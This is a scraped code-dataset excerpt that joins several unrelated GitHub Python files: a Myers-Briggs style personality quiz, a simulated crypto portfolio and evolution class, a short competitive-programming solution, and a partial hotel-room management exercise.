mb)\r\n\r\npart1()\r\nque_no = 11\r\nanswer_a = \" [a] go with the flow\"\r\nanswer_b = \" [b] follow a schedule?\"\r\nquestion = \"In most instances, do you prefer to\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 12\r\nanswer_a = \" [a] private person\"\r\nanswer_b = \" [b] a very open person?\"\r\nquestion = \"Would most people say you are\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 13\r\nanswer_a = \" [a] a practical person\"\r\nanswer_b = \" [b] an ingenious person?\"\r\nquestion = \"Would you rather be considered\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, 
answer_b, mb)\r\n\r\npart1()\r\nque_no = 14\r\nanswer_a = \" [a] introduce others\"\r\nanswer_b = \" [b] get introduced?\"\r\nquestion = \"In a large group do you more often\\n\"\r\nmb = \"ei\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 15\r\nanswer_a = \" [a] is always coming up with new ideas\"\r\nanswer_b = \" [b] has both feet on the ground?\"\r\nquestion = \"Would you rather have as a friend someone who\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 16\r\nanswer_a = \" [a] value sentiment more than logic\"\r\nanswer_b = \" [b] value logic more than sentiment?\"\r\nquestion = \"Are you inclined to\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 17\r\nanswer_a = \" [a] wait and see what happens and then make plans\"\r\nanswer_b = \" [b] plan things far in advance?\"\r\nquestion = \"Do you prefer to\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 18\r\nanswer_a = \" [a] by yourself\"\r\nanswer_b = \" [b] with others?\"\r\nquestion = \"Do you tend to spend a lot of time\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 19\r\nanswer_a = \" [a] gives you more energy\"\r\nanswer_b = \" [b] is often draining?\"\r\nquestion = \"Do you find being around a lot of people\\n\"\r\nmb = \"ei\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 20\r\nanswer_a = \" [a] arrange dates, parties, etc, well in advance\"\r\nanswer_b = \" [b] be free to do whatever looks like fun when the time comes?\"\r\nquestion = \"Do you prefer to\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 21\r\nanswer_a = \" [a] most of the time do whatever you feel like that day\"\r\nanswer_b = \" [b] know ahead of time what you'll be doing most days?\"\r\nquestion = \"In planning a trip would you prefer to\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 22\r\nanswer_a = \" [a] sometimes get bored\"\r\nanswer_b = \" [b] always have fun?\"\r\nquestion = \"At parties, do you\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 23\r\nanswer_a = \" [a] mingle well with others\"\r\nanswer_b = \" [b] tend to keep more to yourself?\"\r\nquestion = \"Do you usually\\n\"\r\nmb = \"ei\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 24\r\nanswer_a = \" [a] a person with a quick and brilliant mind\"\r\nanswer_b = \" [b] a practical person with a lot of common sense?\"\r\nquestion = \"Are you more attracted to\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 25\r\nanswer_a = \" [a] rather enjoy an emergency that makes you work against time\"\r\nanswer_b = \" [b] usually plan your work so you won't need to work under pressure?\"\r\nquestion = \"In your daily work, do you\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 26\r\nanswer_a = \" [a] a lot of time to get to know you\"\r\nanswer_b = \" [b] a little time to get to know you\"\r\nquestion = \"Would you say it generally takes others\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart2()\r\nque_no = 27\r\nanswer_a = \" [a] Private\"\r\nanswer_b = \" [b] Open\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = 
\"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\n# I started flipping que_no and the parts(), found it easier this way... c\r\n# Clean up the above code\r\n\r\nque_no = 28\r\npart2()\r\nanswer_a = \" [a] Scheduled\"\r\nanswer_b = \" [b] Unplanned\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 29\r\npart2()\r\nanswer_a = \" [a] Abstract\"\r\nanswer_b = \" [b] Solid\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 30\r\npart2()\r\nanswer_a = \" [a] Gentle\"\r\nanswer_b = \" [b] Firm\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 31\r\npart2()\r\nanswer_a = \" [a] Thinking\"\r\nanswer_b = \" [b] Feeling\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 32\r\npart2()\r\nanswer_a = \" [a] Facts\"\r\nanswer_b = \" [b] Ideas\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 33\r\npart2()\r\nanswer_a = \" [a] Impulse\"\r\nanswer_b = \" [b] Decision\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 34\r\npart2()\r\nanswer_a = \" [a] Hearty\"\r\nanswer_b = \" [b] Quiet\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ei\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 35\r\npart2()\r\nanswer_a = \" [a] Quiet\"\r\nanswer_b = \" [b] Outgoing\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 36\r\npart2()\r\nanswer_a = \" [a] Systematic\"\r\nanswer_b = \" [b] Casual\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 37\r\npart2()\r\nanswer_a = \" [a] Theory\"\r\nanswer_b = \" [b] Certainty\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 38\r\npart2()\r\nanswer_a = \" [a] Sensitive\"\r\nanswer_b = \" [b] Just\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 39\r\npart2()\r\nanswer_a = \" [a] Convincing\"\r\nanswer_b = \" [b] Touching\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 40\r\npart2()\r\nanswer_a = \" [a] Statement\"\r\nanswer_b = \" [b] Concept\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 41\r\npart2()\r\nanswer_a = \" [a] Unconstrained\"\r\nanswer_b = \" [b] Scheduled\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 42\r\npart2()\r\nanswer_a = \" [a] Reserved\"\r\nanswer_b = \" [b] Talkative\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 43\r\npart2()\r\nanswer_a = \" [a] Orderly\"\r\nanswer_b = \" [b] Easygoing\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 44\r\npart2()\r\nanswer_a = \" [a] Idea\"\r\nanswer_b = \" [b] Actuality\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 45\r\npart2()\r\nanswer_a = \" [a] Compassion\"\r\nanswer_b = \" [b] Foresight\"\r\nquestion = 
\"Evaluate:\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 46\r\npart2()\r\nanswer_a = \" [a] Benefits\"\r\nanswer_b = \" [b] Blessings\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 47\r\npart2()\r\nanswer_a = \" [a] No-nonsense\"\r\nanswer_b = \" [b] Theoretical\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 48\r\npart2()\r\nanswer_a = \" [a] Few Friends\"\r\nanswer_b = \" [b] Lots of Friends\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 49\r\npart2()\r\nanswer_a = \" [a] Systematic\"\r\nanswer_b = \" [b] Spontaneous\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 50\r\npart2()\r\nanswer_a = \" [a] Imaginative\"\r\nanswer_b = \" [b] Matter-of-fact\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 51\r\npart2()\r\nanswer_a = \" [a] Warm\"\r\nanswer_b = \" [b] Objective\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 52\r\npart2()\r\nanswer_a = \" [a] Objective\"\r\nanswer_b = \" [b] Passionate\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 53\r\npart2()\r\nanswer_a = \" [a] Build\"\r\nanswer_b = \" [b] Invent\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 54\r\npart2()\r\nanswer_a = \" [a] Quiet\"\r\nanswer_b = \" [b] Gregarious\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 55\r\npart2()\r\nanswer_a = \" [a] Theory\"\r\nanswer_b = \" [b] Fact\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 56\r\npart2()\r\nanswer_a = \" [a] Compassionate\"\r\nanswer_b = \" [b] Logical\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 57\r\npart2()\r\nanswer_a = \" [a] Analytical\"\r\nanswer_b = \" [b] Sentimental\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 58\r\npart2()\r\nanswer_a = \" [a] Sensible\"\r\nanswer_b = \" [b] Facinating\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 59\r\npart3()\r\nanswer_a = \" [a] Take time to list the separate things to be done and the order of doing them\"\r\nanswer_b = \" [b] Plunge right in?\"\r\nquestion = \"When you start a big project that is due in a week, do you\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 60\r\npart3()\r\nanswer_a = \" [a] Difficult to start and maintain a conversation with some people\"\r\nanswer_b = \" [b] Easy to talk to most people for long periods of time?\"\r\nquestion = \"In social situations do you generally find it\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 61\r\npart3()\r\nanswer_a = \" [a] Do it in the accepted way\"\r\nanswer_b = \" [b] Invent a way of your own?\"\r\nquestion = \"In doing something that many other people do, does it appeal to you more to\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, 
answer_b, mb)\r\n\r\nque_no = 62\r\npart3()\r\nanswer_a = \" [a] Right away\"\r\nanswer_b = \" [b] Only after they really get to know you?\"\r\nquestion = \"Can the new people you meet tell what you are interested in\\n\"\r\nmb = \"ei\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 63\r\npart3()\r\nanswer_a = \" [a] A person of real feeling\"\r\nanswer_b = \" [b] A consistently reasonable person\"\r\nquestion = \"Do you generally prefer courses that teach\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 64\r\npart3()\r\nanswer_a = \" [a] A person of real feeling\"\r\nanswer_b = \" [b] A consistently reasonable person?\"\r\nquestion = \"Is it a higher compliment to be called\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 65\r\npart3()\r\nanswer_a = \" [a] Necessary at times but generally unfavorable\"\r\nanswer_b = \" [b] Helpful and favorable most of the time?\"\r\nquestion = \"Do you find going by a schedule\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 66\r\npart3()\r\nanswer_a = \" [a] Talk individually with people you know well\"\r\nanswer_b = \" [b] Join in the talk of the group?\"\r\nquestion = \"When you are with a group of people, would you usually rather \\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 67\r\npart3()\r\nanswer_a = \" [a] Do much of the talking\"\r\nanswer_b = \" [b] Let others do most of the talking?\"\r\nquestion = \"At parties do you\\n\"\r\nmb = \"ei\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 68\r\npart3()\r\nanswer_a = \" [a] Appeal to you\"\r\nanswer_b = \" [b] Leave you cold?\"\r\nquestion = \"Does the idea of making a list of what you should get done over a weekend\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 69\r\npart3()\r\nanswer_a = \" [a] Competent\"\r\nanswer_b = \" [b] Compassionate?\"\r\nquestion = \"Which is a higher compliment, to be called\\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 70\r\npart3()\r\nanswer_a = \" [a] Make your social engagements some distance ahead\"\r\nanswer_b = \" [b] Be free to do things on the spur of the moment\"\r\nquestion = \"Do you generally prefer to\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 71\r\npart3()\r\nanswer_a = \" [a] Figure out what needs to be done as you go along\"\r\nanswer_b = \" [b] Begin by breaking it down into steps?\"\r\nquestion = \"Overall, when working on a big assignment, do you tend to\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 72\r\npart3()\r\nanswer_a = \" [a] Only with people who share some interest of yours\"\r\nanswer_b = \" [b] With almost anyone?\"\r\nquestion = \"Can you keep a conversation going indefinitely\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 73\r\npart3()\r\nanswer_a = \" [a] Support the established methods of doing good\"\r\nanswer_b = \" [b] Analyze what is still wrong and attack unsolved problems?\"\r\nquestion = \"Would you rather\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 74\r\npart3()\r\nanswer_a = \" [a] Enjoy odd or original ways of saying things\"\r\nanswer_b = \" [b] Like writers to say exactly what they mean?\"\r\nquestion = \"In reading for pleasure, do you\\n\"\r\nmb = 
\"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 75\r\npart3()\r\nanswer_a = \" [a] Good-natured but often inconsistent\"\r\nanswer_b = \" [b] Sharp-tongued but always logical?\"\r\nquestion = \"Would you rather work under a boss (or teacher) who is\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 76\r\npart3()\r\nanswer_a = \" [a] However you feel that particular day\"\r\nanswer_b = \" [b] A set schedule?\"\r\nquestion = \"Would you prefer to do most things according to\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 77\r\npart3()\r\nanswer_a = \" [a] Talk easily to almost anyone for as long as you have to\"\r\nanswer_b = \" [b] Find a lot to say only to certain people or under certain conditions?\"\r\nquestion = \"Can you\\n\"\r\nmb = \"ei\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 78\r\npart3()\r\nanswer_a = \" [a] Weigh the facts\"\r\nanswer_b = \" [b] Consider people's feelings and opinions?\"\r\nquestion = \"When making a decision, is it more important to you to \\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 79\r\npart4()\r\nanswer_a = \" [a] Imaginative\"\r\nanswer_b = \" [b] Realistic\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 80\r\npart4()\r\nanswer_a = \" [a] Bighearted\"\r\nanswer_b = \" [b] Firm-minded\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 81\r\npart4()\r\nanswer_a = \" [a] Fair-minded\"\r\nanswer_b = \" [b] Caring\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 82\r\npart4()\r\nanswer_a = \" [a] Production\"\r\nanswer_b = \" [b] Design\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 83\r\npart4()\r\nanswer_a = \" [a] Possibilities\"\r\nanswer_b = \" [b] Certainties\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 84\r\npart4()\r\nanswer_a = \" [a] Tenderness\"\r\nanswer_b = \" [b] Strength\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 85\r\npart4()\r\nanswer_a = \" [a] Practical\"\r\nanswer_b = \" [b] Sentimental\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 86\r\npart4()\r\nanswer_a = \" [a] Make\"\r\nanswer_b = \" [b] Create\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 87\r\npart4()\r\nanswer_a = \" [a] Novel\"\r\nanswer_b = \" [b] Already Known\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 88\r\npart4()\r\nanswer_a = \" [a] Sympathize\"\r\nanswer_b = \" [b] Analyze\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 89\r\npart4()\r\nanswer_a = \" [a] Strong-willed\"\r\nanswer_b = \" [b] Tenderhearted\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 90\r\npart4()\r\nanswer_a = \" [a] Concrete\"\r\nanswer_b = \" [b] Abstract\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no 
= 91\r\npart4()\r\nanswer_a = \" [a] Devoted\"\r\nanswer_b = \" [b] Determined\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 92\r\npart4()\r\nanswer_a = \" [a] Competent\"\r\nanswer_b = \" [b] Kindhearted\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 93\r\npart4()\r\nanswer_a = \" [a] Practical\"\r\nanswer_b = \" [b] Innovative\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\ndef raw_points():\r\n\tglobal e, s, t, j, i, n, f, p\r\n\tglobal preference\r\n\tprint(f\"\\n###### My Raw Points ###### \\\r\n\t\t\\nExtraversion: {e} \\\r\n \\nIntroversion: {i} \\\r\n \\n----------------- \\\r\n\t\t\\nSensing: {s} \\\r\n \\nIntuition {n} \\\r\n \\n----------------- \\\r\n\t\t\\nThinking: {t} \\\r\n \\nFeeling: {f} \\\r\n \\n----------------- \\\r\n\t\t\\nJudging: {j} \\\r\n\t\t\\nPerceiving: {p} \\\r\n\t\t\\n#######################\")\r\n\r\nprint(\"\\n########## In the event of a category TIE, use the following to break it: ##########\")\r\nprint(\"\\nTie Breakers: \\\r\n\t\\nif E or I has the same value, I wins \\\r\n\t\\nif S or N has the same value, N wins \\\r\n\t\\nif T or F has the same value, F wins \\\r\n\t\\nif J or P has the same value, P wins\")\r\n\r\nprint(\"\\n########## Clarity gives you insight on how far right or left you are within each category ##########\")\r\nprint (\"\\nClarity of Categories: \\\r\n\t\\nE or I, 11 - 13: Slight | 14 - 16: Moderate | 17 - 19: Clear | 20 - 21: Very Clear \\\r\n\t\\nS or N, 13 - 15: Slight | 16 - 20: Moderate | 21 - 24: Clear | 25 - 26: Very Clear \\\r\n\t\\nT or F, 12 - 14: Slight | 15 - 18: Moderate | 19 - 22: Clear | 23 - 24: Very Clear \\\r\n\t\\nJ or P, 11 - 13: Slight | 14 - 16: Moderate | 17 - 20: Clear | 21 - 22: Very Clear \")\r\nprint(\"\\n##################################### My info below ##########################################\")\r\n\r\npreference = []\r\n\r\n# Evaluate E and I\r\nif e > i:\r\n\tpreference.append(\"E\")\r\nif e < i:\r\n\tpreference.append(\"I\")\r\nif e == i:\r\n\tpreference.append(\"I\")\r\n\r\n# Evalute S and N\r\nif s > n:\r\n\tpreference.append(\"S\")\r\nif s < n:\r\n\tpreference.append(\"N\")\r\nif s == n:\r\n\tpreference.append(\"N\")\r\n\r\n# Evalute T and F\r\nif t > f:\r\n\tpreference.append(\"T\")\r\nif t < f:\r\n\tpreference.append(\"F\")\r\nif t == f:\r\n\tpreference.append(\"F\")\r\n\r\n# Evalute J and P\r\nif j > p:\r\n\tpreference.append(\"J\")\r\nif j < p:\r\n\tpreference.append(\"P\")\r\nif j == p:\r\n\tpreference.append(\"P\")\r\n\r\nraw_points()\r\n\r\nprint(f\"\\nMy preference is: {preference}\")\r\n","repo_name":"andreweng/insights","sub_path":"insights.py","file_name":"insights.py","file_ext":"py","file_size_in_byte":24781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35907043558","text":"import hist_service as hs\nimport datetime, time\nimport pandas as pd\nimport numpy as np\n\n\nclass CryptoFolio:\n \n #assume we \n fees = .002\n buys = 0\n sells = 0\n target_amount = 0.1\n ledger = {}\n start = 0\n def __init__(self, start_amount, coins, save_trades=False):\n self.ledger['BTC'] = start_amount\n for ix in range(len(coins)):\n self.ledger[coins[ix]] = 0.0\n self.start = start_amount\n self.hs = hs.HistWorker()\n self.save_trades = save_trades\n\n\n def buy_coin(self, c_name, price):\n amount = self.start * self.target_amount\n 
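# Note at this step (editorial comment, not the author's): buy_coin sizes each
# purchase as a fixed fraction (target_amount = 10%) of the *starting* balance,
# not the current one; the 0.2% fee is charged on top of the spent amount and
# the 1% price markup below models slippage. Hypothetical worked numbers: with
# start = 1000 and price = 0.02, amount = 100, coin_amount = 100 / (0.02 * 1.01)
# which is about 4950.5, and the BTC ledger is debited 100.2 in total.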
if(amount > self.ledger['BTC']):\n            return False\n        else:\n            coin_amount = amount/(price* 1.01)\n            the_fee = self.fees * amount\n            self.ledger['BTC'] -= (amount + the_fee)\n            self.ledger[c_name] += coin_amount\n            self.buys += 1\n            return True\n\n\n    def sell_coin(self, c_name, price):\n        price = price -(price*.01)\n        if self.ledger[c_name] != 0.0:\n            amount = self.ledger[c_name]\n            self.ledger['BTC'] += ((amount*price) - ((amount * price)*self.fees))\n            self.ledger[c_name] = 0.0\n            self.sells += 1\n            return True\n        else:\n            return False\n\n    \n    def get_total_btc_value(self, e_prices):\n        \n        for c in self.ledger.keys():\n            if self.ledger[c] != 0.0 and c != \"BTC\":\n                current_price = e_prices[c]\n                self.sell_coin(c, current_price)\n        return self.ledger['BTC'], self.buys, self.sells\n    \n    def get_total_btc_value_no_sell(self, e_prices):\n        btcval = self.ledger['BTC']\n        for c in self.ledger.keys():\n            if self.ledger[c] != 0.0 and c != \"BTC\":\n                current_price = e_prices[c]\n                btc_amt = current_price * self.ledger[c]\n                btcval += btc_amt\n                #print(c, \" \", btc_amt)\n        return btcval, self.ledger['BTC']\n\n    def evaluate_output(self, out, coin, price):\n        if (out == 1.0):\n            self.buy_coin(coin, price)\n        elif(out==.5):\n            return\n        else:\n            # sell_coin expects (c_name, price); the arguments were swapped here\n            self.sell_coin(coin, price)\n\n\nclass EvoSim:\n    count = 0\n    starting_btc = 1000\n    bestNets = []\n    lastGen = []\n    numNets = 0\n    coins = []\n    market = {}\n    nextGens = []\n    def __init__(self, numberOfNets, coins, gens):\n        self.count += 1\n        self.numNets = numberOfNets\n        self.coins = coins\n        self.lastGen = gens\n        \n    def read_hist(self, coin):\n        try:\n            # read_csv is a module-level pandas function, not a DataFrame method\n            df = pd.read_csv(coin+'_hist.txt')\n            self.market[coin] = df\n            return\n        except:\n            print(\"no history file found\")\n            return\n        \n    def read_all_hists(self):\n        for c in self.coins:\n            self.read_hist(c)\n        return\n    \n    \n    def feedNet(self, nextGens):\n        for ix in range(0, len(nextGens)):\n            print(ix)\n    ","repo_name":"ryandemattia/TradingAI","sub_path":"crypto_evolution.py","file_name":"crypto_evolution.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"29153707094","text":"# def is_AP():\n#     if abs(a-b)==abs(b-c): \n#         return True\n#     else :\n#         return False \n\n# def create_AP():\n#     if is_AP==False:\n#         for m in range(100):\n#             if a 0 and (2*b-c)%a == 0) or (2*b-a > 0 and (2*b-a)%c == 0):\n        print(\"YES\")\n    else:\n        print(\"NO\")\n\n    \n","repo_name":"samanenasiri/Pre_ML_Exercises","sub_path":"Exercise_W2/1624B.py","file_name":"1624B.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"7281247158","text":"from project.rooms.room import Room\nfrom project.rooms.young_couple_with_children import YoungCoupleWithChildren\n\n\nclass Everland:\n    def __init__(self):\n        self.rooms = []\n\n    def add_room(self, room: Room):\n        self.rooms.append(room)\n\n    def get_monthly_consumptions(self):\n        total = 0\n        for room in self.rooms:\n            total += (room.room_cost + room.expenses)\n        return f\"Monthly consumption: {total:.2f}$.\"\n\n    def pay(self):\n        strings = []\n        # iterate over a copy so removing a room does not skip the next one\n        for room in list(self.rooms):\n            total_expenses = room.room_cost + room.expenses\n            if room.budget >= total_expenses:\n                strings.append(f\"{room.family_name} paid {total_expenses:.2f}$ and have {room.budget:.2f}$ left.\")\n                room.budget -= total_expenses\n            else:\n                strings.append(f\"{room.family_name} does not have enough budget and must leave the hotel.\")\n                self.rooms.remove(room)\n        return '\\n'.join(strings)\n\n    def 
